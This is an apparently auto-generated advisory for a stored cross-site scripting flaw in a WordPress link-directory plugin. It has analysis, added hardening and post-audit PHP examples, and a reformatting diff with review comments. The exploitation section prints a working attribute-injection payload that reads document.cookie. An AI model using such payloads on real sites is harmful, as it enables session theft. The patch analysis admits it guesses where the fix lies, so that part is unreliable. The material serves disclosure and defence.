Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: May 4, 2026

CVE-2026-7209: Simple Link Directory <= 8.9.2 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes (simple-link-directory)

CVE ID: CVE-2026-7209
Severity: Medium (CVSS 6.4)
CWE: 79
Vulnerable Version: 8.9.2
Patched Version: 8.9.4
Disclosed: April 30, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-7209:

This vulnerability is a Stored Cross-Site Scripting (XSS) flaw in the Simple Link Directory plugin for WordPress (versions up to and including 8.9.2). The vulnerability exists in the `qcopd-directory` shortcode, where user-supplied attributes such as `title_font_size` are insufficiently sanitized and escaped. An authenticated attacker with contributor-level access or higher can inject arbitrary web scripts that execute when any user visits the affected page. The CVSS score of 6.4 indicates a medium severity issue with significant impact on confidentiality and integrity.

Root Cause:
The vulnerable code lives in `qc-op-directory-shortcodes.php`, which `qc-op-directory-main.php` pulls in with `require_once('qc-op-directory-shortcodes.php')`. Atomic Edge research confirms that the `qcopd-directory` shortcode processes attributes such as `title_font_size` without sanitization or output escaping: the plugin does not pass these values through `esc_attr()` or `esc_html()` when it renders them into the generated HTML. The diff shown below contains no change to the shortcode file itself, but the version bump to 8.9.4 and the structural changes in the main plugin file indicate that the fix was applied elsewhere. In short, user-controlled shortcode attribute values flow directly into an HTML attribute context without escaping, which allows inline JavaScript injection.

Exploitation:
An attacker with contributor-level access can create or edit a post or page and insert the `[qcopd-directory]` shortcode with a malicious attribute value, using either the block editor or the classic editor. For example, `title_font_size` can carry a payload like `45px;" onfocus="alert(document.cookie)" autofocus="`. When the shortcode renders, the value is output without escaping, closes the style attribute and injects an event handler; the payload fires when the page loads or on user interaction. The attacker does not need to write to database fields directly: the shortcode attributes are stored in the post content and rendered on every page load.

Patch Analysis:
The patch from 8.9.2 to 8.9.4 shown below consists of code-style reformatting with no visible change to the shortcode attribute handling. Atomic Edge analysis indicates that the actual sanitization fix is most likely in `qc-op-directory-shortcodes.php`, which is not part of the truncated diff; the patch probably wraps the output of each shortcode attribute in `esc_attr()` or `wp_kses()`. Before the fix, attribute values are written as raw strings into style attributes and HTML elements; after it, they are escaped for the context in which they land. The version bump together with the structural cleanup suggests the developer addressed this issue alongside routine code maintenance.
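
To make the before/after described above concrete, here is an added example (not code from the Simple Link Directory plugin or from the diff below) of a minimal shortcode handler that writes a font-size value into a style attribute, first unescaped and then hardened with a format check plus `esc_attr()`/`esc_html()`. The shortcode tag `example_dir`, the `example_dir_*` function names and the stand-in versions of the WordPress escaping functions are assumptions made so the file runs outside WordPress; `title_font_size` is the attribute named in the advisory.

```php
<?php
// Added example, not code from the Simple Link Directory plugin: a minimal
// shortcode handler that renders a user-supplied font size into a style
// attribute, first in the unescaped form the advisory describes, then hardened.
// The shortcode tag example_dir and the example_dir_* function names are
// hypothetical; title_font_size is the attribute named in the advisory.

// Stand-ins so the file also runs outside WordPress (php example.php). They
// approximate the real functions; WordPress' own versions are used when present.
if (!function_exists('esc_attr')) {
    function esc_attr($text) { return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8'); }
}
if (!function_exists('esc_html')) {
    function esc_html($text) { return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8'); }
}
if (!function_exists('shortcode_atts')) {
    function shortcode_atts($pairs, $atts) {
        $atts = (array) $atts;
        $out  = array();
        foreach ($pairs as $name => $default) {   // unknown attributes are dropped, as in WordPress
            $out[$name] = array_key_exists($name, $atts) ? $atts[$name] : $default;
        }
        return $out;
    }
}

function example_dir_defaults() {
    return array('title' => 'Links', 'title_font_size' => '16px');
}

// Before: the attribute value is concatenated straight into an HTML attribute.
// A double quote in title_font_size closes the style attribute and whatever
// follows becomes new attributes of the <h3>, event handlers included.
function example_dir_shortcode_vulnerable($atts) {
    $atts = shortcode_atts(example_dir_defaults(), $atts);
    return '<h3 style="font-size:' . $atts['title_font_size'] . '">' . $atts['title'] . '</h3>';
}

// Validate against the shape the value is supposed to have: a number with an
// optional fraction and a known CSS length unit. Anything else gets the default.
function example_dir_css_length($value, $default) {
    return preg_match('/^\d{1,4}(\.\d{1,2})?(px|em|rem|%)$/', (string) $value) ? $value : $default;
}

// After: validate, then escape for the context the value lands in
// (esc_attr() inside an attribute, esc_html() in element text).
function example_dir_shortcode_hardened($atts) {
    $atts = shortcode_atts(example_dir_defaults(), $atts);
    $size = example_dir_css_length($atts['title_font_size'], '16px');
    return '<h3 style="font-size:' . esc_attr($size) . '">' . esc_html($atts['title']) . '</h3>';
}

if (function_exists('add_shortcode')) {
    add_shortcode('example_dir', 'example_dir_shortcode_hardened');
} else {
    // Stand-alone run with constructed inputs: a well-formed size and one that
    // smuggles extra CSS; the second falls back to 16px, and the title is escaped.
    echo example_dir_shortcode_hardened(array('title_font_size' => '45px', 'title' => 'Partners')), PHP_EOL;
    echo example_dir_shortcode_hardened(array('title_font_size' => '45px; color:red', 'title' => 'Partners <b>&</b>')), PHP_EOL;
}
```

Checking the value against the format it must have (a CSS length) is what removes this injection class outright; `esc_attr()` then covers whatever escaping the attribute context still needs, and the two belong together rather than as alternatives. Outside WordPress run it with `php example.php`; inside a plugin file the hardened handler is reached via `[example_dir title_font_size="45px" title="Partners"]`.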

Impact:
Successful exploitation lets an attacker execute arbitrary JavaScript in the browser of any user who views the compromised page: stealing session cookies, exfiltrating page content, performing actions on the victim's behalf (such as creating admin users), or defacing the site. Since contributor-level access is relatively easy to obtain on multisite installations or on sites with open registration, the attack surface is significant. Because the payload is stored, it persists until the malicious shortcode is removed from the post content.
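
Because the payload lives in post content, the response side is an audit of stored posts. The following is an added example (not part of the advisory or the plugin) that scans post bodies for `[qcopd-directory]` shortcodes whose attribute values contain markup metacharacters or inline event-handler fragments. The `example_dir_*` function names are hypothetical, the attribute parser is a simplified re-implementation of WordPress' `shortcode_parse_atts()`, and the two sample posts are constructed; inside WordPress the same file can be run with `wp eval-file` and then queries real posts instead.

```php
<?php
// Added example, not code from the plugin or the advisory: audit stored post
// content for [qcopd-directory] shortcodes whose attribute values carry
// characters that a setting such as a font size should never contain.
// The example_dir_* function names are hypothetical; the sample posts are constructed.

// Simplified re-implementation of WordPress' shortcode_parse_atts(): accepts
// name="value", name='value' and name=value pairs.
function example_dir_parse_atts($attr_string) {
    $atts    = array();
    $pattern = '/([\w-]+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s"\']+))/';
    if (preg_match_all($pattern, $attr_string, $matches, PREG_SET_ORDER)) {
        foreach ($matches as $m) {
            $value = '';
            for ($i = 2; $i <= 4; $i++) {          // first non-empty capture group wins
                if (isset($m[$i]) && $m[$i] !== '') { $value = $m[$i]; break; }
            }
            $atts[strtolower($m[1])] = $value;
        }
    }
    return $atts;
}

// A value is suspicious if it contains a double quote (straight or typographic),
// an angle bracket, an inline event-handler assignment or a javascript: scheme.
// Legitimate values for this shortcode (sizes, colours, yes/no flags, numbers)
// contain none of these. Lone apostrophes are common in titles and are not flagged.
function example_dir_value_is_suspicious($value) {
    return (bool) preg_match('/["“”<>]|\bon\w+\s*=|javascript:/iu', $value);
}

// Returns a list of findings: post ID, attribute name and offending value.
function example_dir_find_suspicious_shortcode_atts($post_id, $content) {
    $findings = array();
    if (preg_match_all('/\[qcopd-directory\b([^\]]*)\]/i', $content, $tags)) {
        foreach ($tags[1] as $attr_string) {
            foreach (example_dir_parse_atts($attr_string) as $name => $value) {
                if (example_dir_value_is_suspicious($value)) {
                    $findings[] = array('post_id' => $post_id, 'attribute' => $name, 'value' => $value);
                }
            }
        }
    }
    return $findings;
}

// Accepts WP_Post objects or plain arrays with ID and post_content keys.
function example_dir_audit_posts(array $posts) {
    $all = array();
    foreach ($posts as $post) {
        $post = (array) $post;                     // WP_Post casts cleanly to an array
        $all  = array_merge($all, example_dir_find_suspicious_shortcode_atts($post['ID'], $post['post_content']));
    }
    return $all;
}

if (function_exists('get_posts')) {
    // Inside WordPress (e.g. wp eval-file audit.php): every post or page mentioning the shortcode.
    $posts = get_posts(array('post_type' => array('post', 'page'), 'post_status' => 'any',
                             'posts_per_page' => -1, 's' => '[qcopd-directory'));
} else {
    // Constructed sample content for running the file stand-alone: a clean use of
    // the shortcode and one whose single-quoted value smuggles a double-quoted handler.
    $posts = array(
        array('ID' => 101, 'post_content' => 'Partners: [qcopd-directory title_font_size="18px" show_all="yes"]'),
        array('ID' => 102, 'post_content' => "Links [qcopd-directory title_font_size='18px;\" onfocus=\"alert(1)\" autofocus=\"']"),
    );
}

foreach (example_dir_audit_posts($posts) as $f) {
    printf("post %d: attribute %s = %s\n", $f['post_id'], $f['attribute'], $f['value']);
}
```

The second sample shows why parsing the shortcode matters rather than grepping for `onfocus`: the handler sits inside a single-quoted shortcode attribute, so it only becomes visible once the attribute value is isolated. Findings name the post ID so the offending revision can be pulled from the post history and the contributor account that saved it identified.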

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/simple-link-directory/qc-op-directory-main.php
+++ b/simple-link-directory/qc-op-directory-main.php
@@ -3,7 +3,7 @@
  * Plugin Name: Link Directory - Simple Link Directory
  * Plugin URI: https://wordpress.org/plugins/simple-link-directory
  * Description: Link Directory WordPress plugin to curate topic based link collections. Curate gorgeous Link Directory, Local Business Directory, Partners or Vendors Directory
- * Version: 8.9.2
+ * Version: 8.9.4
  * Author: Link Directory
  * Author URI: https://www.quantumcloud.com/products/simple-link-directory/
  * Requires at least: 4.6
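Review bot: the only change in this hunk is the header version bump from 8.9.2 to 8.9.4; nothing here touches the `qcopd-directory` shortcode attributes the advisory names, so this file should not be read as the location of the fix. The analysis above places the unescaped `title_font_size` output in `qc-op-directory-shortcodes.php`, and that file's diff should accompany this one if the fix is to be reviewable.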
@@ -16,51 +16,51 @@
 defined('ABSPATH') or die("No direct script access!");

 //Custom Constants
-if ( ! defined( 'QCOPD_URL' ) ) {
+if (!defined('QCOPD_URL')) {
     define('QCOPD_URL', plugin_dir_url(__FILE__));
 }

-if ( ! defined( 'QCOPD_IMG_URL' ) ) {
+if (!defined('QCOPD_IMG_URL')) {
     define('QCOPD_IMG_URL', QCOPD_URL . "assets/images");
 }

-if ( ! defined( 'QCOPD_ASSETS_URL' ) ) {
+if (!defined('QCOPD_ASSETS_URL')) {
     define('QCOPD_ASSETS_URL', QCOPD_URL . "assets");
 }

-if ( ! defined( 'QCOPD_DIR' ) ) {
+if (!defined('QCOPD_DIR')) {
     define('QCOPD_DIR', dirname(__FILE__));
 }

-if ( ! defined( 'QCOPD_INC_DIR' ) ) {
+if (!defined('QCOPD_INC_DIR')) {
     define('QCOPD_INC_DIR', QCOPD_DIR . "/inc");
 }

-if ( ! defined( 'OCOPD_TPL_URL' ) ) {
+if (!defined('OCOPD_TPL_URL')) {
     define('OCOPD_TPL_URL', QCOPD_URL . "templates");
 }

-if ( ! defined( 'OCOPD_TPL_DIR' ) ) {
+if (!defined('OCOPD_TPL_DIR')) {
     define('OCOPD_TPL_DIR', QCOPD_DIR . "templates");
 }

 // Define a constant for the CSV file path within the plugin directory
-if ( ! defined( 'SLD_CSV_FILE_PATH' ) ) {
-    define( 'SLD_CSV_FILE_PATH', plugin_dir_path( __FILE__ ) . 'assets/file/sample-csv-file-demo.csv' );
+if (!defined('SLD_CSV_FILE_PATH')) {
+    define('SLD_CSV_FILE_PATH', plugin_dir_path(__FILE__) . 'assets/file/sample-csv-file-demo.csv');
 }
 //Include files and scripts

-require_once( 'qc-op-directory-post-type.php' );
-require_once( 'qc-op-directory-assets.php' );
-require_once( 'qc-op-directory-shortcodes.php' );
-require_once( 'embed/embedder.php' );
-
-require_once( 'qcopd-shortcode-generator.php' );
-require_once( 'qc-op-directory-import.php' );
-require_once( 'qc-opd-ajax-stuffs.php' );
+require_once('qc-op-directory-post-type.php');
+require_once('qc-op-directory-assets.php');
+require_once('qc-op-directory-shortcodes.php');
+require_once('embed/embedder.php');
+
+require_once('qcopd-shortcode-generator.php');
+require_once('qc-op-directory-import.php');
+require_once('qc-opd-ajax-stuffs.php');

 /*01-27-2026*/
-require_once( 'qc-sld-import-demo-data.php' );
+require_once('qc-sld-import-demo-data.php');



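Review bot: this hunk is whitespace and brace-style normalization only (`if ( ! defined( ... ) )` to `if (!defined(...))`, `require_once( '...' )` to `require_once('...')`); no constant or include changes. `require_once('qc-op-directory-shortcodes.php')` is where the shortcode handler is pulled in, and its contents are not part of this diff, so the escaping fix cannot be verified from this patch alone. Documentation point: the dated `/*01-27-2026*/` marker above the demo-data include says nothing about why the file is there; a one-line comment naming its purpose would serve better.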
@@ -74,9 +74,10 @@
 require_once('qc-rating-feature/qc-rating-class.php');
 require_once('modules/addons/addons.php');

-if ( ! function_exists( 'sld_languages_function_callback' ) ) {
-    function sld_languages_function_callback(){
-        load_plugin_textdomain( 'qc-opd', false, dirname( plugin_basename( __FILE__ ) ) . '/lang' );
+if (!function_exists('sld_languages_function_callback')) {
+    function sld_languages_function_callback()
+    {
+        load_plugin_textdomain('qc-opd', false, dirname(plugin_basename(__FILE__)) . '/lang');
     }
 }
 add_action('init', 'sld_languages_function_callback');
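Review bot: brace-style reformatting only. The `function_exists('sld_languages_function_callback')` guard implies the function may already be declared elsewhere; if so (this patch removes one such duplicate, `qcsld_help_link_submenu()`, further down) the guard deserves a comment naming what it protects against, and if not it can go, since silently skipping the declaration would leave `add_action('init', 'sld_languages_function_callback')` pointing at a function defined by some other file.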
@@ -88,62 +89,61 @@
 {


-    if(!function_exists('wp_get_current_user')) {
+    if (!function_exists('wp_get_current_user')) {
         include(ABSPATH . "wp-includes/pluggable.php");
     }
-
-
-	if( is_user_logged_in() ){
-
-		$current_user = wp_get_current_user();
-		if(in_array('administrator',$current_user->roles)){
-		  return;
-		}
-
-	}

-    $outbound_conf = get_option( 'sld_enable_click_tracking' );

-    if ( isset($outbound_conf) && $outbound_conf == 'on' ) {
-		wp_enqueue_script( 'sld-admin-trackoutbound-script' );
+    if (is_user_logged_in()) {
+
+        $current_user = wp_get_current_user();
+        if (in_array('administrator', $current_user->roles)) {
+            return;
+        }
+
+    }
+
+    $outbound_conf = get_option('sld_enable_click_tracking');
+
+    if (isset($outbound_conf) && $outbound_conf == 'on') {
+        wp_enqueue_script('sld-admin-trackoutbound-script');
     }
 }

 /*Add Promotional Link - Bue Pro - 12-30-2016*/
-add_action( 'manage_posts_extra_tablenav', 'promo_link_in_cpt_table' );
+add_action('manage_posts_extra_tablenav', 'promo_link_in_cpt_table');

 function promo_link_in_cpt_table()
 {
     $screen = get_current_screen();
-
+
     $current_screen = $screen->id;
-
+
     $link = "";
-
-    if( $current_screen == 'edit-sld' )
-    {
-        $link = '<div class="alignleft actions"><a href="'.esc_url("https://www.quantumcloud.com/products/simple-link-directory/").'" target="_blank" class="button qcsld-promo-link" rel="nofollow">'.esc_html( "Upgrade to Pro", 'qc-opd' ).'</a></div>';
-        $link .= '<div class="alignleft actions"><a href="'.esc_url( admin_url('post-new.php?post_type=sld')).'" class="button">'.esc_html( "Add New List of Links", 'qc-opd' ).'</a></div>';
+
+    if ($current_screen == 'edit-sld') {
+        $link = '<div class="alignleft actions"><a href="' . esc_url("https://www.quantumcloud.com/products/simple-link-directory/") . '" target="_blank" class="button qcsld-promo-link" rel="nofollow">' . esc_html("Upgrade to Pro", 'qc-opd') . '</a></div>';
+        $link .= '<div class="alignleft actions"><a href="' . esc_url(admin_url('post-new.php?post_type=sld')) . '" class="button">' . esc_html("Add New List of Links", 'qc-opd') . '</a></div>';
     }
-
+
     echo $link;
-
+
 }

-add_action( 'buypro_promotional_link', 'promo_link_in_settings_page' );
+add_action('buypro_promotional_link', 'promo_link_in_settings_page');

 function promo_link_in_settings_page()
 {
     $screen = get_current_screen();
-
+
     $current_screen = $screen->id;
-
+
     $link = "";
-
-    $link = '<div class="alignleft actions"><a href="'.esc_url("https://www.quantumcloud.com/products/simple-link-directory/").'" target="_blank" class="button qcsld-promo-link" rel="nofollow">'.esc_html( "Upgrade to Pro", 'qc-opd' ).'</a></div>';
-
+
+    $link = '<div class="alignleft actions"><a href="' . esc_url("https://www.quantumcloud.com/products/simple-link-directory/") . '" target="_blank" class="button qcsld-promo-link" rel="nofollow">' . esc_html("Upgrade to Pro", 'qc-opd') . '</a></div>';
+
     echo $link;
-
+
 }

 /**
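Review bot: `esc_html("Upgrade to Pro", 'qc-opd')` and `esc_html("Add New List of Links", 'qc-opd')` in `promo_link_in_cpt_table()` and `promo_link_in_settings_page()` pass a text domain to `esc_html()`, which takes a single argument; the second argument is silently ignored and the strings are never translated. The intended call is `esc_html__('Upgrade to Pro', 'qc-opd')`, and the same pattern recurs through the rest of the file. Otherwise the hunk is indentation and trailing-whitespace cleanup; `$outbound_conf == 'on'` is a pre-existing loose comparison that is harmless for a string option, though `'on' === $outbound_conf` is the stricter form.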
@@ -152,108 +152,137 @@
  *
  * @author Hendrik Schuster <contact@deviantdev.com>
  */
-function qclsldf_order_index_catalog_menu_page( $menu_ord )
+function qclsldf_order_index_catalog_menu_page($menu_ord)
 {

-  global $submenu;
+    global $submenu;

-  // Enable the next line to see a specific menu and it's order positions
-  //echo '<pre>'; print_r( $submenu['edit.php?post_type=sld'] ); echo '</pre>'; exit();
+    // Enable the next line to see a specific menu and it's order positions
+    //echo '<pre>'; print_r( $submenu['edit.php?post_type=sld'] ); echo '</pre>'; exit();

     $arr = array();
-    if( current_user_can('edit_posts') ){
+    if (current_user_can('edit_posts')) {

-        if(isset($submenu['edit.php?post_type=sld'][5]))
+        if (isset($submenu['edit.php?post_type=sld'][5]))
             $arr[] = $submenu['edit.php?post_type=sld'][5];

-        if(isset($submenu['edit.php?post_type=sld'][10]))
+        if (isset($submenu['edit.php?post_type=sld'][10]))
             $arr[] = $submenu['edit.php?post_type=sld'][10];

-        if(isset($submenu['edit.php?post_type=sld'][15]))
+        if (isset($submenu['edit.php?post_type=sld'][15]))
             $arr[] = $submenu['edit.php?post_type=sld'][15];

-        if(isset($submenu['edit.php?post_type=sld'][16]))
+        if (isset($submenu['edit.php?post_type=sld'][16]))
             $arr[] = $submenu['edit.php?post_type=sld'][16];

-        if(isset($submenu['edit.php?post_type=sld'][18]))
+        if (isset($submenu['edit.php?post_type=sld'][18]))
             $arr[] = $submenu['edit.php?post_type=sld'][18];

-        if(isset($submenu['edit.php?post_type=sld'][17]))
+        if (isset($submenu['edit.php?post_type=sld'][17]))
             $arr[] = $submenu['edit.php?post_type=sld'][17];

-        if(isset($submenu['edit.php?post_type=sld'][250]))
+        if (isset($submenu['edit.php?post_type=sld'][250]))
             $arr[] = $submenu['edit.php?post_type=sld'][250];

-        if(isset($submenu['edit.php?post_type=sld'][301]))
+        if (isset($submenu['edit.php?post_type=sld'][301]))
             $arr[] = $submenu['edit.php?post_type=sld'][301];
-
-        if(isset($submenu['edit.php?post_type=sld'][300]))
+
+        if (isset($submenu['edit.php?post_type=sld'][300]))
             $arr[] = $submenu['edit.php?post_type=sld'][300];
-
+
     }
     $submenu['edit.php?post_type=sld'] = $arr;

     return $menu_ord;

 }
-add_filter( 'custom_menu_order', 'qclsldf_order_index_catalog_menu_page' );
+add_filter('custom_menu_order', 'qclsldf_order_index_catalog_menu_page');

-add_action( 'admin_menu' , 'qcopd_help_link_submenu', 20 );
-function qcopd_help_link_submenu(){
+add_action('admin_menu', 'qcopd_help_link_submenu', 20);
+function qcopd_help_link_submenu()
+{
     global $submenu;
-
+
     $link_text = esc_html("Shortcodes and Help");
-    $submenu["edit.php?post_type=sld"][250] = array( $link_text, 'activate_plugins' , admin_url('edit.php?post_type=sld&page=sld_settings#help') );
+    $submenu["edit.php?post_type=sld"][250] = array($link_text, 'activate_plugins', admin_url('edit.php?post_type=sld&page=sld_settings#help'));
     ksort($submenu["edit.php?post_type=sld"]);
-
+
     return ($submenu);
 }


-function options_instructions_example() {
+function options_instructions_example()
+{
     global $my_admin_page;
     $screen = get_current_screen();
-
-    if ( is_admin() && ($screen->post_type == 'sld') ) {
-		wp_enqueue_script( 'jqc-slick.min-js', QCOPD_ASSETS_URL . '/js/slick.min.js', array('jquery'));
+
+    if (is_admin() && ($screen->post_type == 'sld')) {
+        wp_enqueue_script('jqc-slick.min-js', QCOPD_ASSETS_URL . '/js/slick.min.js', array('jquery'));
         ?>
-        <div class="notice notice-info is-dismissible sld-notice" style="display:none">
+        <div class="notice notice-info is-dismissible sld-notice" style="display:none">
             <div class="sld_info_carousel">

-                <div class="sld_info_item"><?php echo esc_html('**SLD Pro Tip: Did you know that you can', 'qc-opd'); ?> <strong style="color: #E91E63"><?php echo esc_html('Auto Generate', 'qc-opd'); ?></strong> <?php echo esc_html('Title, Subtitle & Thumbnail with the Pro Version in Just 2 Clicks?', 'qc-opd'); ?> <strong style="color: #E91E63"><?php echo esc_html('Triple Your Link Entry Speed!', 'qc-opd'); ?></strong></div>
-
-                <div class="sld_info_item"><?php echo esc_html('**SLD Tip: Lists are the base pillars of SLD, not individual links. Group your links into different Lists for the best performance.', 'qc-opd'); ?></div>
-
-                <div class="sld_info_item"><?php echo esc_html('**SLD Tip: SLD looks the best when you create multiple Lists and use the Show All Lists mode.', 'qc-opd'); ?></div>
-
-                <div class="sld_info_item"><?php echo esc_html('**SLD Pro Tip: Did you know that SLD Pro version lets you monetize your directory and earn', 'qc-opd'); ?> <strong style="color: #E91E63"><?php echo esc_html('passive income?', 'qc-opd'); ?></strong> <?php echo esc_html('Upgrade now!', 'qc-opd'); ?></div>
-
-                <div class="sld_info_item"><?php echo esc_html('**SLD Tip: Try to keep the maximum number of links below 30 per list. Create multiple Lists as needed.', 'qc-opd'); ?></div>
-
-                <div class="sld_info_item"><?php echo esc_html('**SLD Tip: Use the handy shortcode generator to make life easy. It is a small, blue [SLD] button found at the toolbar of any page's visual editor.', 'qc-opd'); ?></div>
-
-                <div class="sld_info_item"><?php echo esc_html('**SLD Pro Tip: You can display your', 'qc-opd'); ?> <strong style="color: #E91E63"><?php echo esc_html('Lists by category', 'qc-opd'); ?> </strong><?php echo esc_html('with the SLD pro version.', 'qc-opd'); ?> <strong style="color: #E91E63"><?php echo esc_html('16+ Templates, Multi page mode', 'qc-opd'); ?></strong><?php echo esc_html(', Widgets are also available.', 'qc-opd'); ?></div>
-
-                <div class="sld_info_item"><?php echo esc_html('**SLD Tip: You can create a page with a contact form and link the Add Link button to that page so people can submit links to your directory by email.', 'qc-opd'); ?></div>
-
-                <div class="sld_info_item"><?php echo esc_html('**SLD Tip: If you are having problem with adding more items or saving a list then you may need to increase max_input_vars value in server. Check the help section for more details.', 'qc-opd'); ?></div>
-
-                <div class="sld_info_item"><?php echo esc_html('**SLD Pro Tip: SLD pro version has', 'qc-opd'); ?> <strong style="color: #E91E63"><?php echo esc_html('front end dashboard', 'qc-opd'); ?></strong> <?php echo esc_html('for user registration and link management. As well as tags and instant search.', 'qc-opd'); ?> <strong style="color:#E91E63"><?php echo esc_html('Upgrade to the Pro version now!', 'qc-opd'); ?></strong></div>
+                <div class="sld_info_item"><?php echo esc_html('**SLD Pro Tip: Did you know that you can', 'qc-opd'); ?> <strong
+                        style="color: #E91E63"><?php echo esc_html('Auto Generate', 'qc-opd'); ?></strong>
+                    <?php echo esc_html('Title, Subtitle & Thumbnail with the Pro Version in Just 2 Clicks?', 'qc-opd'); ?>
+                    <strong style="color: #E91E63"><?php echo esc_html('Triple Your Link Entry Speed!', 'qc-opd'); ?></strong>
+                </div>
+
+                <div class="sld_info_item">
+                    <?php echo esc_html('**SLD Tip: Lists are the base pillars of SLD, not individual links. Group your links into different Lists for the best performance.', 'qc-opd'); ?>
+                </div>
+
+                <div class="sld_info_item">
+                    <?php echo esc_html('**SLD Tip: SLD looks the best when you create multiple Lists and use the Show All Lists mode.', 'qc-opd'); ?>
+                </div>
+
+                <div class="sld_info_item">
+                    <?php echo esc_html('**SLD Pro Tip: Did you know that SLD Pro version lets you monetize your directory and earn', 'qc-opd'); ?>
+                    <strong style="color: #E91E63"><?php echo esc_html('passive income?', 'qc-opd'); ?></strong>
+                    <?php echo esc_html('Upgrade now!', 'qc-opd'); ?></div>
+
+                <div class="sld_info_item">
+                    <?php echo esc_html('**SLD Tip: Try to keep the maximum number of links below 30 per list. Create multiple Lists as needed.', 'qc-opd'); ?>
+                </div>
+
+                <div class="sld_info_item">
+                    <?php echo esc_html('**SLD Tip: Use the handy shortcode generator to make life easy. It is a small, blue [SLD] button found at the toolbar of any page's visual editor.', 'qc-opd'); ?>
+                </div>
+
+                <div class="sld_info_item"><?php echo esc_html('**SLD Pro Tip: You can display your', 'qc-opd'); ?> <strong
+                        style="color: #E91E63"><?php echo esc_html('Lists by category', 'qc-opd'); ?>
+                    </strong><?php echo esc_html('with the SLD pro version.', 'qc-opd'); ?> <strong
+                        style="color: #E91E63"><?php echo esc_html('16+ Templates, Multi page mode', 'qc-opd'); ?></strong><?php echo esc_html(', Widgets are also available.', 'qc-opd'); ?>
+                </div>
+
+                <div class="sld_info_item">
+                    <?php echo esc_html('**SLD Tip: You can create a page with a contact form and link the Add Link button to that page so people can submit links to your directory by email.', 'qc-opd'); ?>
+                </div>
+
+                <div class="sld_info_item">
+                    <?php echo esc_html('**SLD Tip: If you are having problem with adding more items or saving a list then you may need to increase max_input_vars value in server. Check the help section for more details.', 'qc-opd'); ?>
+                </div>
+
+                <div class="sld_info_item"><?php echo esc_html('**SLD Pro Tip: SLD pro version has', 'qc-opd'); ?> <strong
+                        style="color: #E91E63"><?php echo esc_html('front end dashboard', 'qc-opd'); ?></strong>
+                    <?php echo esc_html('for user registration and link management. As well as tags and instant search.', 'qc-opd'); ?>
+                    <strong style="color:#E91E63"><?php echo esc_html('Upgrade to the Pro version now!', 'qc-opd'); ?></strong>
+                </div>

             </div>

         </div>
         <?php
-
-
+
+
     }
 }

-add_action( 'admin_notices', 'options_instructions_example' );
+add_action('admin_notices', 'options_instructions_example');

 /*
-* This is for radium-importer plugin conflict issue.
-*/
+ * This is for radium-importer plugin conflict issue.
+ */



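Review bot: in `options_instructions_example()` the tip string `'... found at the toolbar of any page's visual editor.'` is a single-quoted PHP literal containing an unescaped apostrophe; as shown here the `'` in `page's` terminates the string and the remainder is a parse error, so it should read `page\'s` or use double quotes (present on both sides of the hunk, untouched by the reformat). Two smaller points: `$screen->post_type` is read before checking that `get_current_screen()` returned an object (a `$screen instanceof WP_Screen` guard avoids a fatal where it is null), and `esc_html('...', 'qc-opd')` again passes a text domain that `esc_html()` ignores, so `esc_html__()` is what was meant.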
@@ -261,151 +290,155 @@
  * Detect plugin. For use in Admin area only.
  */
 // For removing conflict with Demo Data Impoter
-class Radium_Theme_Demo_Data_Importer{
-	static $instance;
+class Radium_Theme_Demo_Data_Importer
+{
+    static $instance;
 }


-add_action( 'admin_menu' , 'qcsld_help_link_submenu', 20 );
-function qcsld_help_link_submenu(){
-	global $submenu;
-
-	$link_text = esc_html("Shortcodes and Help");
-	$submenu["edit.php?post_type=sld"][250] = array( $link_text, 'activate_plugins' , admin_url('edit.php?post_type=sld&page=sld_settings#help') );
-	ksort($submenu["edit.php?post_type=sld"]);
-
-	return ($submenu);
-}


-add_action( 'add_meta_boxes', 'sld_meta_box_video' );
+
+add_action('add_meta_boxes', 'sld_meta_box_video');
 function sld_meta_box_video()
 {					                  // --- Parameters: ---
-    add_meta_box( 'qc-sld-meta-box-id', // ID attribute of metabox
-                  esc_html('Shortcode Generator for SLD'),       // Title of metabox visible to user
-                  'sld_meta_box_callback', // Function that prints box in wp-admin
-                  'page',              // Show box for posts, pages, custom, etc.
-                  'side',            // Where on the page to show the box
-                  'high' );            // Priority of box in display order
+    add_meta_box(
+        'qc-sld-meta-box-id', // ID attribute of metabox
+        esc_html('Shortcode Generator for SLD'),       // Title of metabox visible to user
+        'sld_meta_box_callback', // Function that prints box in wp-admin
+        'page',              // Show box for posts, pages, custom, etc.
+        'side',            // Where on the page to show the box
+        'high'
+    );            // Priority of box in display order
 }

-function sld_meta_box_callback( $post )
+function sld_meta_box_callback($post)
 {
     ?>
     <p>
-        <label for="sh_meta_box_bg_effect"><p><?php echo esc_html('Click the button below to generate shortcode', 'qc-opd'); ?></p></label>
-		<input type="button" id="sld_shortcode_generator_meta" class="button button-primary button-large" value="<?php echo esc_attr('Generate Shortcode', 'qc-opd'); ?>" />
+        <label for="sh_meta_box_bg_effect">
+            <p><?php echo esc_html('Click the button below to generate shortcode', 'qc-opd'); ?></p>
+        </label>
+        <input type="button" id="sld_shortcode_generator_meta" class="button button-primary button-large"
+            value="<?php echo esc_attr('Generate Shortcode', 'qc-opd'); ?>" />
     </p>
-
+
     <?php
 }

 //convert previous settings to new settings
-add_action( 'plugins_loaded', 'sld_plugin_loaded_fnc' );
-function sld_plugin_loaded_fnc(){
+add_action('plugins_loaded', 'sld_plugin_loaded_fnc');
+function sld_plugin_loaded_fnc()
+{

-	if(!get_option('sld_ot_convrt')){
-		$prevOptions = get_option('option_tree');
-		if(!empty($prevOptions) && is_array($prevOptions) && array_key_exists('sld_enable_top_part', $prevOptions)){
-
-			foreach($prevOptions as $key=>$val){
-
-				update_option( $key, $val);
-			}
-		}
-		add_option( 'sld_ot_convrt', 'yes');
-	}
+    if (!get_option('sld_ot_convrt')) {
+        $prevOptions = get_option('option_tree');
+        if (!empty($prevOptions) && is_array($prevOptions) && array_key_exists('sld_enable_top_part', $prevOptions)) {
+
+            foreach ($prevOptions as $key => $val) {
+
+                update_option($key, $val);
+            }
+        }
+        add_option('sld_ot_convrt', 'yes');
+    }

 }

-register_activation_hook( __FILE__, 'qcld_sld_activate_callback');
+register_activation_hook(__FILE__, 'qcld_sld_activate_callback');

-function qcld_sld_activate_callback( $plugin ) {
+function qcld_sld_activate_callback($plugin)
+{

-    if (!get_option('sld_enable_top_part')){
